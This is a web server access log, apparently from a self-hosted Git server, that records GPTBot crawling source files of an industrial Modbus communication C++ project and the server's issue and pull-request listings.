"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:17:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:17:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:59:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:59:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" -[17/Feb/2026:18:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12964] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:18:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13013] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:18:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13009] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:18:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12962] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:18:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13009] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:18:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:18:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20393] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" -[17/Feb/2026:18:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12771] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12373] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12861] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12861] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12771] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" -[17/Feb/2026:18:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" -[17/Feb/2026:18:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11419] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" -[17/Feb/2026:18:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" -[17/Feb/2026:18:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" -[17/Feb/2026:18:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?state=all&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:18:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" -[17/Feb/2026:18:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13351] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr 